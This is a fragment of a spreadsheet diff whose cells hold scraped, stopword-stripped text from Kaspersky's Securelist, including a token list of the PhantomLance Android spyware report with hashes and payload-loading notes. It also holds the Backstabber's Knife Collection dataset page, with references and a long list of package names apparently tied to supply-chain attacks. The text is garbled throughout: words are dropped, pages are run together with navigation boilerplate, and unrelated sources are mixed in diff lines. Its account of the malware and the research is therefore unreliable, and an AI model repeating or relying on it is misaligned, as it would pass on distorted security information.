elrefaei ashraf refaat kaspersky gert malware descriptions what’s notepad infected text editors target chinese users sergey puzan spam phishing reports spam phishing tatyana kulikova olga svistunova andrey kovtun irina shimko roman dedenok latest webinars technologies services 400pm future cybersecurity expect vladimir dashchenko victor sergeev vladislav tushkanov dennis kipker intelligence 400pm responding data breach stepbystep guide anna pavlovskaya cyberthreat talks 400pm advanced persistent predictions igor kuznetsov david marc rivero demeter sherif magdy cyberthreat talks 500pm overview modern compromise techniques methods protection alexander kozlov sergey anufrienko reports hrserv previously unknown shell used attack report kaspersky researchers provide analysis previously unknown hrserv shell exhibits crimeware features likely active since modern asian groups’ tactics techniques procedures ttps asian groups target various organizations multitude regions industries created report provide cybersecurity community bestprepared intelligence data effectively counteract asian groups cascade compromise unveiling lazarus’ campaign unveil lazarus campaign exploiting company products examine intricate connections campaigns catch wild triangle kaspersky researchers obtained stages operation triangulation campaign targeting iphones ipads including zeroday exploits validators triangledb implant additional modules subscribe weekly emails hottest research right inbox email agree provide email address kaspersky lab” receive information posts site understand withdraw consent time email clicking “unsubscribe” link find bottom email sent purposes mentioned subscribe threats threats targeted attacks secure environment mobile threats financial threats spam phishing industrial threats threats vulnerabilities exploits categories categories reports malware descriptions bulletin malware reports spam phishing reports technologies research publications sections archive tags webinars logbook statistics encyclopedia threats descriptions kaspersky rights reserved registered trademarks service marks property respective owners privacy policy license agreement cookies subscribe weekly emails hottest research right inbox email agree provide email address kaspersky lab” receive information posts site understand withdraw consent time email clicking “unsubscribe” link find bottom email sent purposes mentioned subscribe</t>
+          <t>Attackers published spyware using a backdoor trojan injected in apps available in the Google Play store.</t>
         </is>
       </c>
       <c r="D139" t="inlineStr">
         <is>
           <t>https://securelist.com/apt-phantomlance/96772/</t>
-        </is>
-      </c>
-      <c r="E139" t="inlineStr">
-        <is>
-          <t>['solution', 'home', 'product', 'small', 'business', 'employee', 'medium', 'business', 'employee', 'enterprise', 'employee', 'dark', 'mode', 'solution', 'hybrid', 'cloud', 'internet', 'thing', 'management', 'defense', 'industrial', 'cybersecurity', 'fraud', 'prevention', 'solution', 'blockchain', 'kaspersky', 'operation', 'center', 'industry', 'national', 'cybersecurity', 'industrial', 'cybersecurity', 'finance', 'service', 'cybersecurity', 'healthcare', 'cybersecurity', 'transportation', 'cybersecurity', 'retail', 'cybersecurity', 'industry', 'telecom', 'cybersecurity', 'blockchain', 'view', 'product', 'kaspersky', 'endpoint', 'business', 'kaspersky', 'endpoint', 'detection', 'response', 'optimum', 'anti', 'attack', 'platform', 'kaspersky', 'detection', 'response', 'product', 'kaspersky', 'mail', 'server', 'internet', 'gateway', 'kaspersky', 'system', 'cloud', 'azure', 'view', 'service', 'kaspersky', 'cybersecurity', 'service', 'online', 'training', 'premium', 'support', 'kaspersky', 'intelligence', 'intelligence', 'reporting', 'attack', 'service', 'service', 'response', 'cybersecurity', 'training', 'incident', 'communication', 'kaspersky', 'awareness', 'view', 'resource', 'center', 'case', 'white', 'paper', 'datasheet', 'technology', 'mitre', 'attck', 'transparency', 'corporate', 'news', 'press', 'center', 'career', 'innovation', 'sponsorship', 'policy', 'blog', 'contact', 'dark', 'mode', 'login', 'securelist', 'spanish', 'customer', 'personal', 'kaspersky', 'product', 'update', 'product', 'customer', 'support', 'business', 'technical', 'support', 'knowledge', 'base', 'license', 'home', 'product', 'resource', 'center', 'business', 'small', 'business', 'employee', 'medium', 'business', 'employee', 'enterprise', 'employee', 'securelist', 'threat', 'financial', 'threat', 'mobile', 'threat', 'threat', 'secure', 'environment', 'vulnerability', 'spam', 'industrial', 'threat', 'category', 'report', 'incident', 'phishing', 'report', 'kaspersky', 'bulletin', 'archive', 'tag', 'logbook', 'webinar', 'statistic', 'encyclopedia', 'threat', 'description', 'company', 'transparency', 'corporate', 'news', 'press', 'center', 'career', 'sponsorship', 'policy', 'blog', 'contact', 'partner', 'partner', 'partner', 'program', 'content', 'menu', 'close', 'subscribe', 'mode', 'threat', 'threat', 'attack', 'environment', 'mobile', 'threat', 'financial', 'threat', 'spam', 'industrial', 'threat', 'threat', 'vulnerability', 'category', 'category', 'malware', 'description', 'bulletin', 'phishing', 'report', 'research', 'publication', 'archive', 'tag', 'webinar', 'logbook', 'statistic', 'encyclopedia', 'threat', 'description', 'report', 'plain', 'sight', 'phantomlance', 'market', 'report', 'minute', 'read', 'table', 'content', 'malware', 'version', 'version', 'version', 'version', 'version', 'infrastructure', 'victimology', 'previous', 'campaign', 'kaspersky', 'product', 'verdict', 'campaign', 'campaign', 'payloadfree', 'version', 'campaign', 'domain', 'campaign', 'author', 'firsh', 'play', 'sophisticated', 'common', 'malware', 'victim', 'money', 'inquiry', 'longterm', 'campaign', 'phantomlance', 'early', 'registered', 'domain', 'dozen', 'sample', 'wild', 'various', 'application', 'marketplace', 'late', 'sample', 'official', 'android', 'market', 'market', 'late', 'example', 'spyware', 'play', 'investigation', 'various', 'overlap', 'campaign', 'multiple', 'code', 'similarity', 'previous', 'android', 'campaign', 'backdoor', 'crossplatform', 'resemblance', 'attribution', 'detail', 'document', 'actor', 'strategy', 'technique', 'market', 'filter', 'diversity', 'late', 'sample', 'malicious', 'payload', 'research', 'team', 'activity', 'report', 'several', 'section', 'version', 'technical', 'description', 'version', 'feature', 'relationship', 'information', 'specific', 'tactic', 'actor', 'malware', 'infrastructure', 'detail', 'infrastructure', 'piece', 'victimology', 'thought', 'actor', 'interest', 'target', 'previous', 'campaign', 'similarity', 'campaign', 'information', 'available', 'customer', 'kaspersky', 'intelligence', 'information', 'contact', 'research', 'sample', 'series', 'version', 'technical', 'complexity', 'basic', 'version', 'sophisticated', 'version', 'note', 'correlate', 'chronological', 'order', 'appearance', 'example', 'version', 'sample', 'late', 'year', 'functionality', 'sample', 'similar', 'main', 'purpose', 'spyware', 'sensitive', 'information', 'basic', 'functionality', 'geolocation', 'call', 'log', 'contact', 'access', 'access', 'application', 'list', 'application', 'device', 'information', 'model', 'version', 'actor', 'able', 'download', 'various', 'malicious', 'payload', 'payload', 'suitable', 'specific', 'device', 'environment', 'version', 'app', 'actor', 'able', 'application', 'unnecessary', 'feature', 'time', 'information', 'version', 'late', 'google', 'play', 'sample', 'version', 'clear', 'payload', 'version', 'additional', 'executable', 'file', 'main', 'theory', 'reason', 'attacker', 'diverse', 'technique', 'goal', 'bypass', 'official', 'marketplace', 'filter', 'version', 'filter', 'play', 'store', 'detail', 'suspicious', 'permission', 'manifest', 'file', 'executable', 'attempt', 'addition', 'feature', 'root', 'privilege', 'accessible', 'device', 'malware', 'reflection', 'call', 'undocumented', 'function', 'setuidmode', 'permission', 'user', 'trick', 'high', 'operation', 'root', 'access', 'root', 'exploit', 'payload', 'server', 'response', 'device', 'info', 'user', 'work', 'device', 'root', 'permission', 'version', 'specimen', 'version', 'early', 'sample', 'play', 'store', 'blog', 'detection', 'statistic', 'version', 'stamp', 'version', 'replacement', 'version', 'valuable', 'point', 'main', 'difference', 'version', 'malicious', 'payload', 'file', 'asset', 'directory', 'first', 'stage', 'initialization', 'vector', 'first', 'byte', 'payload', 'decryption', 'asset', 'file', 'magic', 'file', 'header', 'string', 'reflection', 'call', 'payload', 'method', 'firststage', 'code', 'fragment', 'explanation', 'payload', 'loading', 'process', 'version', 'payload', 'package', 'name', 'comandroidplaygame', 'official', 'play', 'game', 'package', 'comgoogleandroidplaygame', 'developer', 'version', 'stamp', 'payload', 'developer', 'version', 'stamp', '6bf9b834d841b13348851f2dc033773e', 'e648a2cc826707aec33208408b882e31', 'worth', 'payload', 'manifest', 'permission', 'request', 'description', 'version', 'permission', 'malicious', 'feature', 'undocumented', 'different', 'certificate', 'version', 'payload', 'certificate', '6bf9b834d841b13348851f2dc033773e', 'serial', 'number', 'issuer', 'cnlotvolron', 'validity', 'serial', 'number', 'issuer', 'cnventoplex', 'validity', 'validity', 'date', 'spoofed', 'case', 'real', 'deployment', 'time', 'payload', 'certificate', 'second', 'ventoplex', 'sign', 'version', 'payload', 'version', 'late', 'sample', 'phantomlance', 'introduced', 'technique', 'decrypting', 'payload', 'malicious', 'payload', 'dropper', 'dropper', 'device', 'firebase', 'remote', 'system', 'technical', 'similar', 'one', 'version', 'generation', 'version', 'able', 'valid', 'request', 'phantomlance', 'firebase', 'response', 'struct', 'decryption', 'codedisable', 'value', 'decryption', 'payload', 'entry', 'codedisable', '27ypyitp1ufc9tvh', 'update', 'entry', 'codedisable', '27ypyitp1ufc9tvh', 'important', 'dropper', 'decryption', 'parameter', 'code', 'specific', 'variant', 'function', 'noticed', 'firebase', 'field', 'confdisable', 'value', 'codedisable', 'actor', 'interesting', 'technique', 'actor', 'thirdstage', 'payload', 'implant', 'secondstage', 'payload', 'file', 'datum', 'corrupted', 'header', 'asset', 'path', 'second', 'stage', 'file', 'decrypt', 'first', 'byte', 'result', 'file', 'c399d93146f3d12feb32da23b75304ba', 'typical', 'phantomlance', 'payload', 'server', 'native', 'library', 'dataraw', 'asset', 'path', 'library', 'persistence', 'device', 'custom', 'executable', 'opensource', 'tool', 'component', 'previous', 'sample', 'third', 'stage', 'payload', 'source', 'code', 'version', 'replacement', 'deployment', 'version', 'advanced', 'term', 'technical', 'detail', 'version', 'detection', 'statistic', 'deployment', 'date', 'application', 'market', 'version', 'active', 'valuable', 'point', 'main', 'difference', 'version', 'version', 'firststage', 'dropper', 'version', 'similar', 'decrypting', 'payload', 'minor', 'difference', 'content', 'multiple', 'asset', 'file', 'byte', 'size', 'file', 'payload', 'decryption', 'detail', 'payload', 'decryption', 'sequence', 'config', 'file', 'asset', 'name', 'value', 'payload', 'config', 'file', 'order', 'payload', 'decryption', 'class', 'method', 'name', 'call', 'payload', 'payload', 'integrity', 'check', 'number', 'name', 'payload', 'part', 'payload', 'header', 'first', 'stage', 'payload', 'payload', 'file', 'name', 'payload', 'part', 'content', 'append', 'payload', 'file', 'check', 'integrity', 'payload', 'file', 'value', 'payload', 'config', 'load', 'payload', 'code', 'fragment', 'actual', 'payload', 'decryption', 'process', 'version', 'payload', 'package', 'name', 'comandroidprocessgpsp', 'certificate', 'sign', 'version', 'payload', 'developer', 'version', 'stamp', 'version', 'payload', 'notable', 'sample', 'version', 'payload', 'dropper', 'wild', 'payload', 'certificate', 'variableclassmethod', 'name', 'buildconfig', 'value', 'developer', 'version', 'conclusion', 'technical', 'review', 'worth', 'payload', 'different', 'version', 'version', 'fact', 'clear', 'payload', 'dropper', 'share', 'code', 'structure', 'location', 'sensitive', 'string', 'address', 'main', 'vector', 'actor', 'distribution', 'application', 'marketplace', 'apart', 'comzimicebrowserturbo', 'track', 'many', 'malicious', 'application', 'play', 'search', 'result', 'link', 'play', 'application', 'appearance', 'google', 'play', 'package', 'name', 'play', 'persistence', 'date', 'comunianinadsskipper', 'comzonjobbrowsercleaner', 'comlinevialabffont', 'multiple', 'thirdparty', 'marketplace', 'play', 'malicious', 'application', 'many', 'other', 'malicious', 'application', 'description', 'thirdparty', 'marketplace', 'hxxpsandroidappsapkcodetailchamsocbeyeubabycare', 'case', 'deployment', 'actor', 'fake', 'developer', 'profile', 'fake', 'enduser', 'license', 'agreement', 'eula', 'example', 'play', 'page', 'fake', 'developer', 'email', 'part', 'fake', 'developer', 'identity', 'account', 'report', 'file', 'type', 'eula', 'extensive', 'investigation', 'certain', 'tactic', 'actor', 'malware', 'initial', 'version', 'application', 'marketplace', 'malicious', 'payload', 'code', 'dropping', 'payload', 'version', 'suspicious', 'followup', 'version', 'malicious', 'payload', 'code', 'drop', 'execute', 'payload', 'able', 'behavior', 'sample', 'able', 'version', 'application', 'payload', 'example', 'behavior', 'apkpure', 'version', 'skipper', 'malicious', 'payload', 'apkpure', 'thirdparty', 'marketplace', 'table', 'play', 'application', 'metadata', 'play', 'server', 'safe', 'assume', 'sample', 'table', 'play', 'well', 'infrastructure', 'server', 'infrastructure', 'multiple', 'domain', 'similarity', 'previous', 'one', 'malware', 'sample', 'piece', 'attacker', 'infrastructure', 'example', 'infrastructure', 'phantomlance', 'infrastructure', 'year', 'expired', 'domain', 'name', 'maintenance', 'infrastructure', 'future', 'domain', 'last', 'sample', 'subdomain', 'server', 'parent', 'domain', 'resolution', 'one', 'valid', 'resolution', 'address', 'digitalocean', 'cloud', 'infrastructure', 'provider', 'domaintool', 'host', 'total', 'website', 'record', 'passive', 'database', 'dozen', 'website', 'aforementioned', 'phantomlance', 'domain', 'interesting', 'overlap', 'domain', 'sample', 'industry', 'information', 'domain', 'victimology', 'infection', 'attack', 'rough', 'cartographic', 'representation', 'country', 'attack', 'number', 'detection', 'actor', 'distribution', 'vector', 'publication', 'malicious', 'sample', 'available', 'application', 'store', 'secondary', 'infection', 'random', 'victim', 'actor', 'interest', 'detail', 'victim', 'type', 'application', 'malware', 'common', 'luring', 'application', 'flash', 'plugin', 'cleaner', 'updater', 'find', 'pub', 'vietnamese', 'application', 'near', 'church', 'place', 'publisher', 'description', 'hxxpsapksupportappencomcodedexonchurchaddress', 'vietnamese', 'information', 'church', 'whole', 'information', 'priest', 'phone', 'number', 'email', 'activity', 'holiday', 'bulknewsexpressnew', 'tin', 'ngày', 'daily', 'newspaper', 'mobile', 'news', 'application', 'previous', 'campaign', 'section', 'correlation', 'phantomlance', 'activity', 'campaign', 'report', 'campaign', 'indicator', 'information', 'telemetry', 'first', 'track', 'sample', 'important', 'note', 'detection', 'statistic', 'majority', 'user', 'campaign', 'exception', 'small', 'number', 'individual', 'main', 'infection', 'vector', 'link', 'malicious', 'application', 'thirdparty', 'website', 'email', 'attack', 'example', 'victim', 'malware', 'last', 'request', 'late', 'malware', 'download', 'event', 'small', 'amount', 'activity', 'judging', 'volume', 'malware', 'number', 'detection', 'main', 'campaign', 'place', 'good', 'similarity', 'code', 'structure', 'comparison', 'sample', 'developer', 'version', 'payload', 'code', 'structure', 'comparison', 'sample', 'payload', 'multiple', 'difference', 'similar', 'pattern', 'malware', 'implementation', 'developer', 'module', 'plugin', 'meaning', 'class', 'similar', 'functionality', 'example', 'comparison', 'method', 'parser', 'class', 'parser', 'parserwriterreader', 'public', 'void', 'appendbooleanboolean', 'public', 'void', 'appendbooleanboolean', 'value', 'public', 'void', 'appendbytebyte', 'datum', 'public', 'void', 'appendbytebyte', 'value', 'public', 'void', 'appendbytesbyte', 'datum', 'public', 'void', 'appendbytesbyte', 'value', 'public', 'void', 'appenddoubledouble', 'public', 'void', 'appenddoubledouble', 'value', 'public', 'void', 'appendintint', 'public', 'void', 'appendintint', 'value', 'public', 'void', 'appendlonglong', 'public', 'void', 'value', 'private', 'void', 'appendnumberobject', 'value', 'public', 'void', 'appendshortshort', 'public', 'void', 'appendshortshort', 'value', 'public', 'void', 'public', 'void', 'value', 'public', 'byte', 'getcontent', 'public', 'byte', 'getcontent', 'public', 'void', 'public', 'public', 'byte', 'getbyte', 'public', 'byte', 'getbyte', 'public', 'byte', 'getbyte', 'public', 'byte', 'getbyte', 'public', 'double', 'getdouble', 'public', 'double', 'getdouble', 'public', 'float', 'getfloat', 'public', 'getint', 'public', 'getint', 'public', 'getlong', 'getlong', 'public', 'short', 'getshort', 'public', 'short', 'getshort', 'byte', 'getsignal', 'public', 'string', 'public', 'string', 'attribution', 'technology', 'phantomlance', 'payload', 'least', 'similar', 'one', 'multiple', 'public', 'report', 'backdoor', 'industry', 'order', 'possible', 'caveat', 'difficult', 'compare', 'malware', 'different', 'platform', 'different', 'programming', 'language', 'implementation', 'process', 'analysis', '306d3ed0a7c899b5ef9d0e3c91f05193', 'able', 'minor', 'track', 'code', 'pattern', 'particular', 'main', 'class', 'name', 'similar', 'functionality', 'converter', 'packet', 'parser', 'summary', 'notable', 'attribution', 'platform', 'usage', 'redundant', 'different', 'server', 'sample', 'subdomain', 'example', 'sample', 'private', 'report', 'server', 'description', 'complete', 'analysis', 'previous', 'campaign', 'actor', 'interest', 'victim', 'infrastructure', 'similarity', 'activity', 'campaign', 'medium', 'confidence', 'timeline', 'campaign', 'activity', 'previous', 'campaign', 'successor', 'active', 'result', 'research', 'able', 'scope', 'evolution', 'actor', 'activity', 'year', 'kaspersky', 'product', 'campaign', '7048d56d923e049ca7f3d97fb5ba9812', 'e648a2cc826707aec33208408b882e31', '6bf9b834d841b13348851f2dc033773e', 'd23472f47833049034011cad68958b46', 'af44bb0dd464680395230ade0d6414cd', 'phantomlance', 'payloadfree', 'version', 'campaign', '50bfd62721b4f3813c2d20b59642f022', 'c630ab7b51f0c0fa38a4a0f45c793e24', 'd61c18e577cfc046a6252775da12294f', 'fe15c0eacdbf5a46bc9b2af9c551f86a', '315f8e3da94920248676b095786e26ad', '641f0cc057e2ab43f5444c5547e80976', 'domain', 'address', 'usjaxonsorensenclub', 'author', 'firsh', 'hiding', 'plain', 'sight', 'phantomlance', 'market', 'email', 'address', 'field', 'name', 'email', 'guy', 'reply', 'tarek', 'thank', 'interesting', 'research', 'curious', 'high', 'number', 'primary', 'target', 'stat', 'rooted', 'app', 'iphone', 'connected', 'phone', 'messing', 'stimulus', 'check', 'day', 'reply', 'excellent', 'information', 'interested', 'individual', 'possible', 'form', 'great', 'detail', 'blackberry', 'interesting', 'thank', 'reply', 'table', 'content', 'malware', 'version', 'version', 'version', 'version', 'version', 'infrastructure', 'victimology', 'previous', 'campaign', 'kaspersky', 'product', 'verdict', 'campaign', 'campaign', 'payloadfree', 'version', 'campaign', 'domain', 'campaign', 'great', 'webinar', '100pm', 'great', 'great', 'idea', 'great', 'idea', 'malware', 'attribution', 'nextgen', 'honeypot', 'marco', 'preuss', 'denis', 'legezo', 'raiu', 'baumgartner', 'great', 'idea', 'actor', 'front', '200pm', 'great', 'idea', 'hunting', 'technique', 'author', 'chain', 'stalkerware', 'unfriendly', 'zeroday', 'vulnerability', 'telegram', 'weekly', 'email', 'hot', 'research', 'right', 'inbox', 'email', 'email', 'address', 'lab', 'information', 'post', 'site', 'consent', 'time', 'email', 'unsubscribe', 'link', 'bottom', 'email', 'purpose', 'subscribe', 'category', 'unknown', 'shell', 'attack', 'modern', 'asian', 'group', 'tactic', 'technique', 'procedure', 'cascade', 'compromise', 'campaign', 'wild', 'triangle', 'stripedfly', 'radar', 'late', 'post', 'post', 'attack', 'surface', 'exploitable', 'kaspersky', 'gert', 'malware', 'description', 'notepad', 'text', 'editor', 'chinese', 'user', 'spam', 'phishing', 'report', 'spam', 'late', 'webinar', 'technology', 'service', 'future', 'cybersecurity', 'datum', 'breach', 'stepbystep', 'guide', 'talk', 'advanced', 'persistent', 'prediction', 'igor', 'cyberthreat', 'overview', 'modern', 'compromise', 'technique', 'method', 'unknown', 'shell', 'attack', 'report', 'kaspersky', 'researcher', 'analysis', 'unknown', 'feature', 'active', 'modern', 'asian', 'group', 'tactic', 'technique', 'procedure', 'asian', 'group', 'various', 'organization', 'multitude', 'region', 'industry', 'report', 'cybersecurity', 'community', 'bestprepared', 'intelligence', 'datum', 'asian', 'group', 'compromise', 'campaign', 'campaign', 'company', 'product', 'intricate', 'connection', 'campaign', 'wild', 'triangle', 'kaspersky', 'researcher', 'stage', 'operation', 'triangulation', 'campaign', 'iphone', 'ipad', 'zeroday', 'validator', 'implant', 'additional', 'module', 'weekly', 'email', 'hot', 'research', 'right', 'inbox', 'email', 'email', 'address', 'lab', 'information', 'post', 'site', 'consent', 'time', 'email', 'unsubscribe', 'link', 'bottom', 'email', 'purpose', 'subscribe', 'threat', 'threat', 'attack', 'environment', 'mobile', 'threat', 'financial', 'threat', 'spam', 'industrial', 'threat', 'threat', 'vulnerability', 'category', 'category', 'malware', 'description', 'bulletin', 'phishing', 'report', 'research', 'publication', 'archive', 'tag', 'webinar', 'logbook', 'statistic', 'encyclopedia', 'threat', 'description', 'kaspersky', 'right', 'trademark', 'service', 'property', 'respective', 'owner', 'privacy', 'policy', 'license', 'agreement', 'cookie', 'weekly', 'email', 'hot', 'research', 'right', 'inbox', 'email', 'email', 'address', 'lab', 'information', 'post', 'site', 'consent', 'time', 'email', 'unsubscribe', 'link', 'bottom', 'email', 'purpose', 'subscribe']</t>
         </is>
       </c>
     </row>
@@ -4068,17 +3522,12 @@
       </c>
       <c r="C140" t="inlineStr">
         <is>
-          <t>backstabbersknifecollection view github backstabber’s knife collection access shoot email ohmatcsunibonnde cite inproceedingsohm2020backstabber titlebackstabbers knife collection review open source software supply chain attacks authorohm marc plate henrik sykosch arnold meier michael booktitleinternational conference detection intrusions malware vulnerability assessment year2020 organizationspringer similar datasets httpsgithubcomlxyeternalpypimalregistry dataset described paper empirical study malicious code pypi ecosystem integrated backstabber’s knife collection talking httpsreproduciblebuildsorgdocspublications httpstwittercomspartaeustatus1314219751070146568 httpsblogssapcom20200626attacksonopensourcesupplychainshowhackerspoisonthewell httpsnewsycombinatorcomitemid23244778 httpswwwsonatypecom2020ssc httpsblogphylumiomaliciouspackagestyposquattingandotherattacksagainstopensourcedependencies httpsblogphylumiomaliciousjavascriptcodeinnpmmalware httpsblogphylumiowhatisthestateofnpm httpspypiscanreadthedocsioenlatest httpsxebiacomblogopensourcesupplychainattacks httpsmediumcomalexbirsandependencyconfusion4a5d60fec610 httpslwnnetarticles834078 httpsaboutgitlabcomblog20210723announcingpackagehunter httpswwwscytheiolibrarymalwarerisksinopensourcecode httpseventseclipseorg2020samiotpresentationsk1presentationpdf httpsgiterscomtpike3softwaresupplychaincompromises httpscseciteventsworkshopecosystemslidesplatepdf httpswwwcybersecuritydivecomnewsopensourcesoftwaresecurityrsasupplychain600710 httpswwwetsmtlcarechercheetudessuperieuresetrechercheprojetsderecherchepouretudiantsminingsoftwareupdatestopreventsupplychainat httpstalkpythonfmepisodesshow319typosquattingandsupplychainsvulnerabilities httpszhwikipediaorgwikie4be9be5ba94e993bee694bbe587bb httpsnationalinterestorgblogskepticssupplychainintelligencedangerousnewworld174458 httpswwwiqtorgcanopensourcecodestealyourgenome httpsiblackhatcomusa21wednesdayhandoutsus21securingopensourcesoftwareendtoendatmassivescaletogetherpdf httpswwwboozallencominsightscybertechinsighttohuntingforsoftwaresupplychainthreatshtml httpsopensourcesecuritypodcastlibsyncomepisode298davidawheelerdiscussestheopenssf httpscheckmarxcomresourcesmakingtherightappsecdecisionsattackerstargetpackagesinmultipleprogramminglanguagesinrecentsoftwaresupplychainattacks httpsblogchainguarddevtamingpythonmalwarescanners httpswwwredditcomrblueteamseccommentsll34bwbackstabbersknifecollectionareviewofopen httpswwwopensourceforucom202208dataprotectionattheconvergenceofopensourceandzerotrust httpswebstanfordeduclasscs253lectureslecture2020pdf httpssocketdevbloginsidenodemodules httpstldrseccomblogtldrsec038 httpseventslinuxfoundationorgwpcontentuploads202107developingsecureopensourcesoftwareosspdf httpswwwdavisriedeldepostssoftwaresabotageinopensourceprojects httpscybergccasitesdefaultfilescyber202112cyberthreattooperationaltechnologywhiteepdf httpsblogdshrorg202006supportingopensourcesoftwarehtml package index mavencentral comgithubcodingandcodingmailwatcherplugin comgithubcodingandcodingmavencompilerplugin comgithubcodingandcodingservletapi 1337qqjs 1rucache 30daysofjavascript 33jsconcepts 4equest bootsantosbootsantos olxbrgitlabnodesdk pornhubalerts xvideosalerts afunction apossibleprototype a11yspeak aatestkit acookie actionsnextbundleanalyzer actionstoolbox adal addposition addtounscopables addonactions addonlinks advancestringindex affirmdev affirmdev1 agentassignment agrifoodfarming agrifoodfarmingrest aianomalydetector aidocumenttranslator aidocumenttranslatorrest aiformrecognizer aimetricsadvisor aitextanalytics airpal alireacttablemonorepo alicon aliyundrive alphawalletandroid alprazolamdiv amazingauthrails aninstance anobject an0nchatlib anarchy angluarcli angularlocationupdate antaniui antdcloud anyvega apiextractor apiextractor2 aploybro aploydiv applicationinsightsanalytics applicationinsightsanalyticsjs applicationinsightschannel applicationinsightschanneljs applicationinsightscommon applicationinsightsdependencies applicationinsightsdependenciesjs applicationinsightsproperties applicationinsightspropertiesjs applicationinsightsreactjs applicationinsightsshims applicationinsightsweb arduinoideextension arewyoumadatme armadvisor armanalysisservices armapimanagement armappconfiguration armappinsights armappplatform armappservice armattestation armauthorization armavs armazurestack armazurestackhci armbatch armbilling armbotservice armcdn armchangeanalysis armcognitiveservices armcommerce armcommitmentplans armcommunication armcompute armconfluent armconsumption armcontainerinstance armcontainerregistry armcontainerservice armcosmosdb armcustomerinsights armdatabox armdataboxedge armdatabricks armdatacatalog armdatadog armdatafactory armdatalakeanalytics armdatamigration armdeploymentmanager armdesktopvirtualization armdeviceprovisioningservices armdevspaces armdevtestlabs armdigitaltwins armdns armdnsresolver armdomainservices armeventgrid armeventhub armextendedlocation armfeatures armfrontdoor armhanaonazure armhdinsight armhealthbot armhealthcareapis armhybridcompute armhybridkubernetes armimagebuilder armiotcentral armiothub armkeyvault armkubernetesconfiguration armkusto armlabservices armlinks armloadtestservice armlock armlocks armlogic armmachinelearningcompute armmachinelearningexperimentation armmachinelearningservices armmanagedapplications armmanagementgroups armmanagementpartner armmaps armmariadb armmarketplaceordering armmediaservices armmigrate armmixedreality armmobilenetwork armmonitor armmsi armmysql armnetapp armnetwork armnotificationhubs armoep armoperationalinsights armoperations armorbital armpeering armpolicy armpolicyinsights armportal armpostgresql armpostgresqlflexible armpowerbidedicated armpowerbiembedded armprivatedns armpurview armquota armrecoveryservices armrecoveryservicessiterecovery armrecoveryservicesbackup armrediscache armredisenterprisecache armrelay armreservations armresourcegraph armresourcehealth armresourcemover armresources armresourcessubscriptions armsearch armsecurity armsecurityinsight armserialconsole armservicebus armservicefabric armservicefabricmesh armservicemap armsignalr armsql armsqlvirtualmachine armstorage armstoragecache armstorageimportexport armstoragesync armstorsimple1200series armstorsimple8000series armstreamanalytics armsubscriptions armsupport armsynapse armtemplatespecs armtimeseriesinsights armtrafficmanager armvideoanalyzer armvisualstudio armvmwarecloudsimple armwebpubsub armwebservices armworkspaces arrayiteration arraymethodhasspeciessupport arraymethodusestolength arrayspeciescreate assetclitool astviewer asynccontroller autocompletecore autocompletepresetalgolia autocompleteshared autorestcore autorestschemas autorestgotest autoresttestmodeler autoresttestserver axiosreplace azureagrifood azureagrifoodfarmingsamplesjs azureagrifoodfarmingsamplests azureai azureaianomalydetector azureaianomalydetectorsamplesjs azureaianomalydetectorsamplests azureaidocumenttranslator azureaidocumenttranslatorsamplesjs azureaiform azureaiformrecognizerjs azureaiformrecognizersamplesjs azureaiformrecognizersamplests azureaiformrecognizerts azureaimetricsadvisor azureaimetricsadvisorsamplesjs azureaimetricsadvisorsamplests azureaitext azureaitextanalytics azureaitextanalyticsjs azureaitextanalyticssamplesjs azureaitextanalyticssamplests azureaitextanalyticsts azureappconfiguration azureappconfigurationsamplesjs azureappconfigurationsamplests azurecommunicationchat azurecommunicationidentity azurecommunicationidentitysamplesjs azurecommunicationidentitysamplests azurecommunicationnetworktraversal azurecommunicationnetworktraversalsamplesjs azurecommunicationnetworktraversalsamplests azurecommunicationphonenumbers azurecommunicationphonenumberssamplests azurecommunicationshortcodes azurecommunicationshortcodessamplesjs azurecommunicationshortcodessamplests azurecommunicationsms azurecommunicationsmssamplesjs azurecommunicationsmssamplests azureconfidential azureconfidentialledgersamplesjs azureconfidentialledgersamplests azurecontainerregistry azurecorerestpipeline azurecorerestpipelinejs azurecorerestpipelinesamplesjs azurecorerestpipelinesamplests azurecorerestpipelinets azurecosmos azurecosmossamplesjs azuredata azuredatafactoryutilities azuredatatables azuredatatablesjs azuredatatablessamplesjs azuredatatablessamplests azuredatatablests azuredigital azuredigitaltwins azuredigitaltwinscore azuredigitaltwinscorejs azuredigitaltwinscoresamplesjs azuredigitaltwinscoresamplests azuredigitaltwinscorets azuredocs azureeventhubsbrowser azureeventhubsexpress azureeventhubssamplesbrowser azureeventhubssamplesexpress azureeventhubssamplesjs azureeventhubssamplests azureeventprocessor azureeventprocessorhostsamplesbowser azureeventprocessorhostsamplesexpress azureeventprocessorhostsamplesjs azureeventprocessorhostsamplests azureeventgridsamplesjs azureeventgridsamplests azureeventhubscheckpointstore azureeventhubscheckpointstoreblob azureeventhubscheckpointstoreblobsamplesjs azureeventhubscheckpointstoreblobsamplests azurefilter2 azurefilter3 azurefunctiontest azurefunctionscsharp azureidentity azureidentitysamplesjs azureidentitysamplests azureiot azureiotdeviceupdate azureiotmodelsrepository azureiotmodelsrepositorysamplesjs azureiotmodelsrepositorysamplests azureiotuxbaseline azureiotuxfluentcontrols azureiotuxfluentcss azurejsdevtools azurekeyvaultadmin azurekeyvaultadminsamplesjs azurekeyvaultcertificates azurekeyvaultcertificatesjs azurekeyvaultcertificatessamplesjs azurekeyvaultcertificatessamplests azurekeyvaultcertificatests azurekeyvaultkeys azurekeyvaultkeysjs azurekeyvaultkeyssamplesjs azurekeyvaultkeyssamplests azurekeyvaultkeysts azurekeyvaultsecrets azurekeyvaultsecretsjs azurekeyvaultsecretssamplesjs azurekeyvaultsecretssamplests azurekeyvaultsecretsts azuremixedreality azuremixedrealityauthentication azuremixedrealityauthenticationsamplesjs azuremixedrealityauthenticationsamplests azuremockhub azuremockhubsamplesjs azuremockhubsamplests azuremonitoropentelemetry azuremonitoropentelemetryexporter azuremonitoropentelemetryexportersamplesjs azuremonitoropentelemetryexportersamplests azuremonitorquery azuremonitorquerysamplesjs azuremonitorquerysamplests azurepipelinesdtltasks azurepurview azurepurviewaccount azurepurviewaccountsamplesjs azurepurviewaccountsamplests azurepurviewadministration azurepurviewadministrationsamplesjs azurepurviewadministrationsamplests azurepurviewcatalog azurepurviewcatalogsamplesjs azurepurviewcatalogsamplests azurepurviewscanning azurepurviewscanningsamplesjs azurepurviewscanningsamplests azurequantum azurequantumjobs azurequantumjobssamplesjs azureschema azureschemaregistryavrosamplesjs azureschemaregistryavrosamplests azureschemaregistrysamplesjs azureschemaregistrysamplests azuresdkforjavacodegen azuresdkv3 azuresearchdocuments azuresearchdocumentssamplesjs azuresearchdocumentssamplests 